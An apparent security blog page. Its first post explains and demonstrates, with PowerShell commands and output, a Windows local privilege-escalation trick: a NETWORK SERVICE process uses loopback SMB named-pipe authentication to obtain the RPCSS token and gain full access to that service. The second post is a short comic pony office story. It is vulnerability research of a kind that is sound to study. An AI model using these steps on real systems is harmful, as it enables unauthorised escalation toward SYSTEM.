Saturday, 25 April 2020
Sharing a Logon Session a Little Too Much
Let's get straight to it, when LSASS creates a Token for a new Logon session it stores that Token for later retrieval. For the most part this isn't that useful, however there is one case where the session Token is repurposed, network authentication. If you look at the prototype of AcquireCredentialsHandle where you specify the user to use for network authentication you'll notice a pvLogonID parameter. The explanatory note says:
"A pointer to a locally unique identifier (LUID) that identifies the user. This parameter is provided for file-system processes such as network redirectors. This parameter can be NULL."
What does this really mean? We'll if you have TCB privilege when doing network authentication this parameter specifies the Logon Session ID (or Authentication ID if you're coming from the Token's perspective) for the Token to use for the network authentication. Of course normally this isn't that interesting if the network authentication is going to another machine as the Token can't follow ('ish). However what about Local Loopback Authentication? In this case it does matter as it means that the negotiated Token on the server, which is the same machine, will actually be the session's Token, not the caller's Token.
Of course if you have TCB you can almost do whatever you like, why is this useful? The clue is back in the explanatory note, "... such as network redirectors". What's an easily accessible network redirector which supports local loopback authentication? SMB. Is there any primitives which SMB supports which allows you to get the network authentication token? Yes, Named Pipes. Will SMB do the network authentication in kernel mode and thus have effective TCB privilege? You betcha. To the PowerShellz!
Note, this is tested on Windows 10 1909, results might vary. First you'll need a PowerShell process running at NETWORK SERVICE. You can follow the instructions from my previous blog post on how to do that. Now with that shell we're running a vanilla NETWORK SERVICE process, nothing special. We do have SeImpersonatePrivilege though so we could probably run something like Rotten Potato, but we won't. Instead why not target the RPCSS service process, it also runs as NETWORK SERVICE and usually has loads of juicy Token handles we could steal to get to SYSTEM. There's of course a problem doing that, let's try and open the RPCSS service process.
PS> Get-RunningService "rpcss"
Name Status ProcessId
---- ------ ---------
rpcss Running 1152
PS> $p = Get-NtProcess -ProcessId 1152
Get-NtProcess : (0xC0000022) - {Access Denied}
A process has requested access to an object, but has not been granted those access rights.
Well, that puts an end to that. But wait, what Token would we get from a loop back authentication over SMB? Let's try it. First create a named pipe and start it listening for a new connection.
PS> $pipe = New-NtNamedPipeFile \\.\pipe\ABC -Win32Path
PS> $job = Start-Job { $pipe.Listen() }
Next open a handle to the pipe via localhost, and then wait for the job to complete.
PS> $file = Get-NtFile \\localhost\pipe\ABC -Win32Path
PS> Wait-Job $job | Out-Null
Finally open the RPCSS process again while impersonating the named pipe.
PS> $p = Use-NtObject($pipe.Impersonate()) {
>> Get-NtProcess -ProcessId 1152
>> }
PS> $p.GrantedAccess
AllAccess
How on earth does that work? Remember I said that the Token stored by LSASS is the first token created in that Logon Session? Well the first NETWORK SERVICE process is RPCSS, so the Token which gets saved is RPCSS's one. We can prove that by opening the impersonation token and looking at the group list.
PS> $token = Use-NtObject($pipe.Impersonate()) {
>> Get-NtToken -Impersonation
>> }
PS> $token.Groups | ? Name -Match Rpcss
Name Attributes
---- ----------
NT SERVICE\RpcSs EnabledByDefault, Owner
Weird behavior, no? Of course this works for every logon session, though a normal user's session isn't quite so interesting. Also don't forget that if you access the admin shares as NETWORK SERVICE you'll actually be authenticated as the RPCSS service so any files it might have dropped with the Service SID would be accessible. Anyway, I'm sure others can come up with creative abuses of this.
Wednesday, 1 April 2020
Taking a joke a little too far.
Extract from “Rainbow Dash and the Open Plan Office”.
Dash was
tapping away on the only thing a pony could ever love, the Das Keyboard with
rainbow colored LED Cherry Blues. Dash is nothing if not on brand when it comes
to illumination. It had been bought in a pique of distain for equine kind, a
real low point in what Dash liked to call, annus mirabilis. It was clear Dash
liked to sound smart but had skipped Latin lessons at school.
Applejack
tried to remain oblivious to the click-clacking coming from the next desk over.
But even with the comically over-sized noise cancelling headphones, more akin
to ear defenders than something to listen to music with, it all got too much.
“Hey, Dash,
did you really have to buy such a noisy keyboard?”, Applejack queried with a tinge
of anger. “Very much so, it allows my creativity to flow. Real professionals
need real tools. You can’t be a real professional with some inferior Cherry
Reds.”, Dash shot back. “Well, if your profession is shit posting on Reddit
that might be true, but you’ve only committed 10 lines of code in the past week.”.
This elicited an indignant response from Dash, “I spend my time meticulously
crafting dulcet prose. Only when it’s ready do I commit my 1000-line object d’art
to a change request for reading by mere mortals like yourself.”.
Letting out
a groan of frustration Applejack went back to staring at the monitor to wonder
why the borrow checker was throwing errors again. The job was only to make ends
meet until the debt on the farm could be repaid after the “incident”. At any
rate arguing wasn’t worth the time, everyone knew Dash was a favorite of the basement dwelling boss,
nothing that pony could do would really lead to anything close to a satisfactory
defenestration.
“Have you
ever wondered how everyone on the internet is so stupid?”, Dash opined, almost
to nopony in particular. Applejack, clearly seeing an in, retorted “Well George
Carlin is quoted as saying “Think of how stupid the average person is, and
realize half of them are stupider than that.”, it’s clear where the dividing
line exists in this office”. “I think if George had the chance to use Twitter
he might have revised the calculations a bit” Dash quipped either ignoring the
barb or perhaps missing it entirely.
To be
continued… not.